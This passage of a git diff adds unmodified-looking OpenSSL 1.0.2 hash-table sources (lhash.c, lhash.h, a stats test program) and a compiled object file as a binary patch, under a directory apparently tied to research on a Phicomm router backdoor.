+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <openssl/lhash.h>
+
+main()
+{
+    LHASH *conf;
+    char buf[256];
+    int i;
+
+    conf = lh_new(lh_strhash, strcmp);
+    for (;;) {
+        char *p;
+
+        buf[0] = '\0';
+        fgets(buf, 256, stdin);
+        if (buf[0] == '\0')
+            break;
+        i = strlen(buf);
+        p = OPENSSL_malloc(i + 1);
+        memcpy(p, buf, i + 1);
+        lh_insert(conf, p);
+    }
+
+    lh_node_stats(conf, stdout);
+    lh_stats(conf, stdout);
+    lh_node_usage_stats(conf, stdout);
+    exit(0);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/lhash.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/lhash.c
new file mode 100644
index 0000000..53c5c13
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/lhash.c
@@ -0,0 +1,458 @@
+/* crypto/lhash/lhash.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*-
+ * Code for dynamic hash table routines
+ * Author - Eric Young v 2.0
+ *
+ * 2.2 eay - added #include "crypto.h" so the memory leak checking code is
+ *           present. eay 18-Jun-98
+ *
+ * 2.1 eay - Added an 'error in last operation' flag. eay 6-May-98
+ *
+ * 2.0 eay - Fixed a bug that occurred when using lh_delete
+ *           from inside lh_doall().  As entries were deleted,
+ *           the 'table' was 'contract()ed', making some entries
+ *           jump from the end of the table to the start, there by
+ *           skipping the lh_doall() processing. eay - 4/12/95
+ *
+ * 1.9 eay - Fixed a memory leak in lh_free, the LHASH_NODEs
+ *           were not being free()ed. 21/11/95
+ *
+ * 1.8 eay - Put the stats routines into a separate file, lh_stats.c
+ *           19/09/95
+ *
+ * 1.7 eay - Removed the fputs() for realloc failures - the code
+ *           should silently tolerate them.  I have also fixed things
+ *           lint complained about 04/05/95
+ *
+ * 1.6 eay - Fixed an invalid pointers in contract/expand 27/07/92
+ *
+ * 1.5 eay - Fixed a misuse of realloc in expand 02/03/1992
+ *
+ * 1.4 eay - Fixed lh_doall so the function can call lh_delete 28/05/91
+ *
+ * 1.3 eay - Fixed a few lint problems 19/3/1991
+ *
+ * 1.2 eay - Fixed lh_doall problem 13/3/1991
+ *
+ * 1.1 eay - Added lh_doall
+ *
+ * 1.0 eay - First version
+ */
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <openssl/crypto.h>
+#include <openssl/lhash.h>
+
+const char lh_version[] = "lhash" OPENSSL_VERSION_PTEXT;
+
+#undef MIN_NODES
+#define MIN_NODES       16
+#define UP_LOAD         (2*LH_LOAD_MULT) /* load times 256 (default 2) */
+#define DOWN_LOAD       (LH_LOAD_MULT) /* load times 256 (default 1) */
+
+static void expand(_LHASH *lh);
+static void contract(_LHASH *lh);
+static LHASH_NODE **getrn(_LHASH *lh, const void *data, unsigned long *rhash);
+
+_LHASH *lh_new(LHASH_HASH_FN_TYPE h, LHASH_COMP_FN_TYPE c)
+{
+    _LHASH *ret;
+    int i;
+
+    if ((ret = OPENSSL_malloc(sizeof(_LHASH))) == NULL)
+        goto err0;
+    if ((ret->b = OPENSSL_malloc(sizeof(LHASH_NODE *) * MIN_NODES)) == NULL)
+        goto err1;
+    for (i = 0; i < MIN_NODES; i++)
+        ret->b[i] = NULL;
+    ret->comp = ((c == NULL) ? (LHASH_COMP_FN_TYPE)strcmp : c);
+    ret->hash = ((h == NULL) ? (LHASH_HASH_FN_TYPE)lh_strhash : h);
+    ret->num_nodes = MIN_NODES / 2;
+    ret->num_alloc_nodes = MIN_NODES;
+    ret->p = 0;
+    ret->pmax = MIN_NODES / 2;
+    ret->up_load = UP_LOAD;
+    ret->down_load = DOWN_LOAD;
+    ret->num_items = 0;
+
+    ret->num_expands = 0;
+    ret->num_expand_reallocs = 0;
+    ret->num_contracts = 0;
+    ret->num_contract_reallocs = 0;
+    ret->num_hash_calls = 0;
+    ret->num_comp_calls = 0;
+    ret->num_insert = 0;
+    ret->num_replace = 0;
+    ret->num_delete = 0;
+    ret->num_no_delete = 0;
+    ret->num_retrieve = 0;
+    ret->num_retrieve_miss = 0;
+    ret->num_hash_comps = 0;
+
+    ret->error = 0;
+    return (ret);
+ err1:
+    OPENSSL_free(ret);
+ err0:
+    return (NULL);
+}
+
+void lh_free(_LHASH *lh)
+{
+    unsigned int i;
+    LHASH_NODE *n, *nn;
+
+    if (lh == NULL)
+        return;
+
+    for (i = 0; i < lh->num_nodes; i++) {
+        n = lh->b[i];
+        while (n != NULL) {
+            nn = n->next;
+            OPENSSL_free(n);
+            n = nn;
+        }
+    }
+    OPENSSL_free(lh->b);
+    OPENSSL_free(lh);
+}
+
+void *lh_insert(_LHASH *lh, void *data)
+{
+    unsigned long hash;
+    LHASH_NODE *nn, **rn;
+    void *ret;
+
+    lh->error = 0;
+    if (lh->up_load <= (lh->num_items * LH_LOAD_MULT / lh->num_nodes))
+        expand(lh);
+
+    rn = getrn(lh, data, &hash);
+
+    if (*rn == NULL) {
+        if ((nn = (LHASH_NODE *)OPENSSL_malloc(sizeof(LHASH_NODE))) == NULL) {
+            lh->error++;
+            return (NULL);
+        }
+        nn->data = data;
+        nn->next = NULL;
+#ifndef OPENSSL_NO_HASH_COMP
+        nn->hash = hash;
+#endif
+        *rn = nn;
+        ret = NULL;
+        lh->num_insert++;
+        lh->num_items++;
+    } else {                    /* replace same key */
+
+        ret = (*rn)->data;
+        (*rn)->data = data;
+        lh->num_replace++;
+    }
+    return (ret);
+}
+
+void *lh_delete(_LHASH *lh, const void *data)
+{
+    unsigned long hash;
+    LHASH_NODE *nn, **rn;
+    void *ret;
+
+    lh->error = 0;
+    rn = getrn(lh, data, &hash);
+
+    if (*rn == NULL) {
+        lh->num_no_delete++;
+        return (NULL);
+    } else {
+        nn = *rn;
+        *rn = nn->next;
+        ret = nn->data;
+        OPENSSL_free(nn);
+        lh->num_delete++;
+    }
+
+    lh->num_items--;
+    if ((lh->num_nodes > MIN_NODES) &&
+        (lh->down_load >= (lh->num_items * LH_LOAD_MULT / lh->num_nodes)))
+        contract(lh);
+
+    return (ret);
+}
+
+void *lh_retrieve(_LHASH *lh, const void *data)
+{
+    unsigned long hash;
+    LHASH_NODE **rn;
+    void *ret;
+
+    lh->error = 0;
+    rn = getrn(lh, data, &hash);
+
+    if (*rn == NULL) {
+        lh->num_retrieve_miss++;
+        return (NULL);
+    } else {
+        ret = (*rn)->data;
+        lh->num_retrieve++;
+    }
+    return (ret);
+}
+
+static void doall_util_fn(_LHASH *lh, int use_arg, LHASH_DOALL_FN_TYPE func,
+                          LHASH_DOALL_ARG_FN_TYPE func_arg, void *arg)
+{
+    int i;
+    LHASH_NODE *a, *n;
+
+    if (lh == NULL)
+        return;
+
+    /*
+     * reverse the order so we search from 'top to bottom' We were having
+     * memory leaks otherwise
+     */
+    for (i = lh->num_nodes - 1; i >= 0; i--) {
+        a = lh->b[i];
+        while (a != NULL) {
+            /*
+             * 28/05/91 - eay - n added so items can be deleted via lh_doall
+             */
+            /*
+             * 22/05/08 - ben - eh? since a is not passed, this should not be
+             * needed
+             */
+            n = a->next;
+            if (use_arg)
+                func_arg(a->data, arg);
+            else
+                func(a->data);
+            a = n;
+        }
+    }
+}
+
+void lh_doall(_LHASH *lh, LHASH_DOALL_FN_TYPE func)
+{
+    doall_util_fn(lh, 0, func, (LHASH_DOALL_ARG_FN_TYPE)0, NULL);
+}
+
+void lh_doall_arg(_LHASH *lh, LHASH_DOALL_ARG_FN_TYPE func, void *arg)
+{
+    doall_util_fn(lh, 1, (LHASH_DOALL_FN_TYPE)0, func, arg);
+}
+
+static void expand(_LHASH *lh)
+{
+    LHASH_NODE **n, **n1, **n2, *np;
+    unsigned int p, i, j;
+    unsigned long hash, nni;
+
+    lh->num_nodes++;
+    lh->num_expands++;
+    p = (int)lh->p++;
+    n1 = &(lh->b[p]);
+    n2 = &(lh->b[p + (int)lh->pmax]);
+    *n2 = NULL;                 /* 27/07/92 - eay - undefined pointer bug */
+    nni = lh->num_alloc_nodes;
+
+    for (np = *n1; np != NULL;) {
+#ifndef OPENSSL_NO_HASH_COMP
+        hash = np->hash;
+#else
+        hash = lh->hash(np->data);
+        lh->num_hash_calls++;
+#endif
+        if ((hash % nni) != p) { /* move it */
+            *n1 = (*n1)->next;
+            np->next = *n2;
+            *n2 = np;
+        } else
+            n1 = &((*n1)->next);
+        np = *n1;
+    }
+
+    if ((lh->p) >= lh->pmax) {
+        j = (int)lh->num_alloc_nodes * 2;
+        n = (LHASH_NODE **)OPENSSL_realloc(lh->b,
+                                           (int)(sizeof(LHASH_NODE *) * j));
+        if (n == NULL) {
+/*                      fputs("realloc error in lhash",stderr); */
+            lh->error++;
+            lh->p = 0;
+            return;
+        }
+        /* else */
+        for (i = (int)lh->num_alloc_nodes; i < j; i++) /* 26/02/92 eay */
+            n[i] = NULL;        /* 02/03/92 eay */
+        lh->pmax = lh->num_alloc_nodes;
+        lh->num_alloc_nodes = j;
+        lh->num_expand_reallocs++;
+        lh->p = 0;
+        lh->b = n;
+    }
+}
+
+static void contract(_LHASH *lh)
+{
+    LHASH_NODE **n, *n1, *np;
+
+    np = lh->b[lh->p + lh->pmax - 1];
+    lh->b[lh->p + lh->pmax - 1] = NULL; /* 24/07-92 - eay - weird but :-( */
+    if (lh->p == 0) {
+        n = (LHASH_NODE **)OPENSSL_realloc(lh->b,
+                                           (unsigned int)(sizeof(LHASH_NODE *)
+                                                          * lh->pmax));
+        if (n == NULL) {
+/*                      fputs("realloc error in lhash",stderr); */
+            lh->error++;
+            return;
+        }
+        lh->num_contract_reallocs++;
+        lh->num_alloc_nodes /= 2;
+        lh->pmax /= 2;
+        lh->p = lh->pmax - 1;
+        lh->b = n;
+    } else
+        lh->p--;
+
+    lh->num_nodes--;
+    lh->num_contracts++;
+
+    n1 = lh->b[(int)lh->p];
+    if (n1 == NULL)
+        lh->b[(int)lh->p] = np;
+    else {
+        while (n1->next != NULL)
+            n1 = n1->next;
+        n1->next = np;
+    }
+}
+
+static LHASH_NODE **getrn(_LHASH *lh, const void *data, unsigned long *rhash)
+{
+    LHASH_NODE **ret, *n1;
+    unsigned long hash, nn;
+    LHASH_COMP_FN_TYPE cf;
+
+    hash = (*(lh->hash)) (data);
+    lh->num_hash_calls++;
+    *rhash = hash;
+
+    nn = hash % lh->pmax;
+    if (nn < lh->p)
+        nn = hash % lh->num_alloc_nodes;
+
+    cf = lh->comp;
+    ret = &(lh->b[(int)nn]);
+    for (n1 = *ret; n1 != NULL; n1 = n1->next) {
+#ifndef OPENSSL_NO_HASH_COMP
+        lh->num_hash_comps++;
+        if (n1->hash != hash) {
+            ret = &(n1->next);
+            continue;
+        }
+#endif
+        lh->num_comp_calls++;
+        if (cf(n1->data, data) == 0)
+            break;
+        ret = &(n1->next);
+    }
+    return (ret);
+}
+
+/*
+ * The following hash seems to work very well on normal text strings no
+ * collisions on /usr/dict/words and it distributes on %2^n quite well, not
+ * as good as MD5, but still good.
+ */
+unsigned long lh_strhash(const char *c)
+{
+    unsigned long ret = 0;
+    long n;
+    unsigned long v;
+    int r;
+
+    if ((c == NULL) || (*c == '\0'))
+        return (ret);
+/*-
+    unsigned char b[16];
+    MD5(c,strlen(c),b);
+    return(b[0]|(b[1]<<8)|(b[2]<<16)|(b[3]<<24));
+*/
+
+    n = 0x100;
+    while (*c) {
+        v = n | (*c);
+        n += 0x100;
+        r = (int)((v >> 2) ^ v) & 0x0f;
+        ret = (ret << r) | (ret >> (32 - r));
+        ret &= 0xFFFFFFFFL;
+        ret ^= v * v;
+        c++;
+    }
+    return ((ret >> 16) ^ ret);
+}
+
+unsigned long lh_num_items(const _LHASH *lh)
+{
+    return lh ? lh->num_items : 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/lhash.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/lhash.h
new file mode 100644
index 0000000..b6c328b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/lhash.h
@@ -0,0 +1,240 @@
+/* crypto/lhash/lhash.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * Header for dynamic hash table routines Author - Eric Young
+ */
+
+#ifndef HEADER_LHASH_H
+# define HEADER_LHASH_H
+
+# include <openssl/e_os2.h>
+# ifndef OPENSSL_NO_FP_API
+#  include <stdio.h>
+# endif
+
+# ifndef OPENSSL_NO_BIO
+#  include <openssl/bio.h>
+# endif
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+typedef struct lhash_node_st {
+    void *data;
+    struct lhash_node_st *next;
+# ifndef OPENSSL_NO_HASH_COMP
+    unsigned long hash;
+# endif
+} LHASH_NODE;
+
+typedef int (*LHASH_COMP_FN_TYPE) (const void *, const void *);
+typedef unsigned long (*LHASH_HASH_FN_TYPE) (const void *);
+typedef void (*LHASH_DOALL_FN_TYPE) (void *);
+typedef void (*LHASH_DOALL_ARG_FN_TYPE) (void *, void *);
+
+/*
+ * Macros for declaring and implementing type-safe wrappers for LHASH
+ * callbacks. This way, callbacks can be provided to LHASH structures without
+ * function pointer casting and the macro-defined callbacks provide
+ * per-variable casting before deferring to the underlying type-specific
+ * callbacks. NB: It is possible to place a "static" in front of both the
+ * DECLARE and IMPLEMENT macros if the functions are strictly internal.
+ */
+
+/* First: "hash" functions */
+# define DECLARE_LHASH_HASH_FN(name, o_type) \
+        unsigned long name##_LHASH_HASH(const void *);
+# define IMPLEMENT_LHASH_HASH_FN(name, o_type) \
+        unsigned long name##_LHASH_HASH(const void *arg) { \
+                const o_type *a = arg; \
+                return name##_hash(a); }
+# define LHASH_HASH_FN(name) name##_LHASH_HASH
+
+/* Second: "compare" functions */
+# define DECLARE_LHASH_COMP_FN(name, o_type) \
+        int name##_LHASH_COMP(const void *, const void *);
+# define IMPLEMENT_LHASH_COMP_FN(name, o_type) \
+        int name##_LHASH_COMP(const void *arg1, const void *arg2) { \
+                const o_type *a = arg1;             \
+                const o_type *b = arg2; \
+                return name##_cmp(a,b); }
+# define LHASH_COMP_FN(name) name##_LHASH_COMP
+
+/* Third: "doall" functions */
+# define DECLARE_LHASH_DOALL_FN(name, o_type) \
+        void name##_LHASH_DOALL(void *);
+# define IMPLEMENT_LHASH_DOALL_FN(name, o_type) \
+        void name##_LHASH_DOALL(void *arg) { \
+                o_type *a = arg; \
+                name##_doall(a); }
+# define LHASH_DOALL_FN(name) name##_LHASH_DOALL
+
+/* Fourth: "doall_arg" functions */
+# define DECLARE_LHASH_DOALL_ARG_FN(name, o_type, a_type) \
+        void name##_LHASH_DOALL_ARG(void *, void *);
+# define IMPLEMENT_LHASH_DOALL_ARG_FN(name, o_type, a_type) \
+        void name##_LHASH_DOALL_ARG(void *arg1, void *arg2) { \
+                o_type *a = arg1; \
+                a_type *b = arg2; \
+                name##_doall_arg(a, b); }
+# define LHASH_DOALL_ARG_FN(name) name##_LHASH_DOALL_ARG
+
+typedef struct lhash_st {
+    LHASH_NODE **b;
+    LHASH_COMP_FN_TYPE comp;
+    LHASH_HASH_FN_TYPE hash;
+    unsigned int num_nodes;
+    unsigned int num_alloc_nodes;
+    unsigned int p;
+    unsigned int pmax;
+    unsigned long up_load;      /* load times 256 */
+    unsigned long down_load;    /* load times 256 */
+    unsigned long num_items;
+    unsigned long num_expands;
+    unsigned long num_expand_reallocs;
+    unsigned long num_contracts;
+    unsigned long num_contract_reallocs;
+    unsigned long num_hash_calls;
+    unsigned long num_comp_calls;
+    unsigned long num_insert;
+    unsigned long num_replace;
+    unsigned long num_delete;
+    unsigned long num_no_delete;
+    unsigned long num_retrieve;
+    unsigned long num_retrieve_miss;
+    unsigned long num_hash_comps;
+    int error;
+} _LHASH;                       /* Do not use _LHASH directly, use LHASH_OF
+                                 * and friends */
+
+# define LH_LOAD_MULT    256
+
+/*
+ * Indicates a malloc() error in the last call, this is only bad in
+ * lh_insert().
+ */
+# define lh_error(lh)    ((lh)->error)
+
+_LHASH *lh_new(LHASH_HASH_FN_TYPE h, LHASH_COMP_FN_TYPE c);
+void lh_free(_LHASH *lh);
+void *lh_insert(_LHASH *lh, void *data);
+void *lh_delete(_LHASH *lh, const void *data);
+void *lh_retrieve(_LHASH *lh, const void *data);
+void lh_doall(_LHASH *lh, LHASH_DOALL_FN_TYPE func);
+void lh_doall_arg(_LHASH *lh, LHASH_DOALL_ARG_FN_TYPE func, void *arg);
+unsigned long lh_strhash(const char *c);
+unsigned long lh_num_items(const _LHASH *lh);
+
+# ifndef OPENSSL_NO_FP_API
+void lh_stats(const _LHASH *lh, FILE *out);
+void lh_node_stats(const _LHASH *lh, FILE *out);
+void lh_node_usage_stats(const _LHASH *lh, FILE *out);
+# endif
+
+# ifndef OPENSSL_NO_BIO
+void lh_stats_bio(const _LHASH *lh, BIO *out);
+void lh_node_stats_bio(const _LHASH *lh, BIO *out);
+void lh_node_usage_stats_bio(const _LHASH *lh, BIO *out);
+# endif
+
+/* Type checking... */
+
+# define LHASH_OF(type) struct lhash_st_##type
+
+# define DECLARE_LHASH_OF(type) LHASH_OF(type) { int dummy; }
+
+# define CHECKED_LHASH_OF(type,lh) \
+  ((_LHASH *)CHECKED_PTR_OF(LHASH_OF(type),lh))
+
+/* Define wrapper functions. */
+# define LHM_lh_new(type, name) \
+  ((LHASH_OF(type) *)lh_new(LHASH_HASH_FN(name), LHASH_COMP_FN(name)))
+# define LHM_lh_error(type, lh) \
+  lh_error(CHECKED_LHASH_OF(type,lh))
+# define LHM_lh_insert(type, lh, inst) \
+  ((type *)lh_insert(CHECKED_LHASH_OF(type, lh), \
+                     CHECKED_PTR_OF(type, inst)))
+# define LHM_lh_retrieve(type, lh, inst) \
+  ((type *)lh_retrieve(CHECKED_LHASH_OF(type, lh), \
+                       CHECKED_PTR_OF(type, inst)))
+# define LHM_lh_delete(type, lh, inst) \
+  ((type *)lh_delete(CHECKED_LHASH_OF(type, lh),                        \
+                     CHECKED_PTR_OF(type, inst)))
+# define LHM_lh_doall(type, lh,fn) lh_doall(CHECKED_LHASH_OF(type, lh), fn)
+# define LHM_lh_doall_arg(type, lh, fn, arg_type, arg) \
+  lh_doall_arg(CHECKED_LHASH_OF(type, lh), fn, CHECKED_PTR_OF(arg_type, arg))
+# define LHM_lh_num_items(type, lh) lh_num_items(CHECKED_LHASH_OF(type, lh))
+# define LHM_lh_down_load(type, lh) (CHECKED_LHASH_OF(type, lh)->down_load)
+# define LHM_lh_node_stats_bio(type, lh, out) \
+  lh_node_stats_bio(CHECKED_LHASH_OF(type, lh), out)
+# define LHM_lh_node_usage_stats_bio(type, lh, out) \
+  lh_node_usage_stats_bio(CHECKED_LHASH_OF(type, lh), out)
+# define LHM_lh_stats_bio(type, lh, out) \
+  lh_stats_bio(CHECKED_LHASH_OF(type, lh), out)
+# define LHM_lh_free(type, lh) lh_free(CHECKED_LHASH_OF(type, lh))
+
+DECLARE_LHASH_OF(OPENSSL_STRING);
+DECLARE_LHASH_OF(OPENSSL_CSTRING);
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/lhash.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/lhash.o
new file mode 100644
index 0000000000000000000000000000000000000000..4aa26c43b2e22d4e8f1b6e468ae64a47a85f519b
GIT binary patch
literal 5160
zcmbtWU2qfE6<+;-7eZGGr5(+LG&@r@Q7C96Llc`Yjn<Owt9V_T$OgAS6=4h8#g;wt
z$}u!0w2C2{MUXyprhTKo!*n`rr%ym<f*n#sC`pWgAyXdeW>RVpB#@Sp0`2ykyZ73g
zwVj9d&fLA{e)s(C`MJ9<)~gL}mrLNoC45zw-EmY9di=9=jFK_ICrE;_S=pqtC-vJ(
zTT;K!o+A1^qTktQru;@zFgi)h_;W=6LsIt!$(>t9Tqd;>!w(ouD~Uc0r+01<!=oDC
z7D?x%T3R>JY&_aL`o6ZBn8m|jBw5=R^cR+clAffoA*kvfDCVWnF>P6MNehb2Mpsa*
zyz>oJzqw_bvQ^opd{arE{JZZ9ccWuu)YP`@eOk~qy@s!&9FsxaE54WB)Se=~*Ur`J
zXOj9DG0SAhN94PwkcH^y$oN%v^c?a1X0rGfpYr&b<oT%tpy#I(OU6iaqH==huaog>
zexRutrS13#sBI_uZBqIQPy)XGiQfV-jk~1&1{odmy|fzCAKwiC<2tbyXvz_tq>&jN
zEBICYZ}rjlDSGuD@|L|5un5F_ofPl-3m=lv8-*%jtU)lT_XR~VdKrMy!<6f&2n*&Y
zsc#MXlX@Z;IEr~pmJ`8{;08V8Q(r__MkIo7j6@9zBN5{S;Y2GZIymthCwe$B$O()C
z=y@r)7YP_hzig3|e$__*&_*9-v;zD`7_I74m{1yHOk_-HgBbri6}?Q1?+CTq0>cmM
z?-FA}84o4Z=oY6@5+Yc+VV<n~iSD)#{X<Z46;G^eZHi7R?NrrmTBgP8e&hK-7csnF
z3IP*=;D}H;Mq^ERKX(P9CXze<B(;qp-~Nlhl`y*Hgpmpo{g!G}nd8K4jDf%PrL94i
z-V#U{J69%L6A3*nH<dO_HJ6r+LDeS9m<oXyJ~H~Iwu%^vKRT%zPbTl&PS#$~KASWe
zM50$E4HwZBF{v-9Tu7Goh?TeNYtQGmCrZI5j<tY>@he_cFO$;eP#JwmD6fLgETXsN
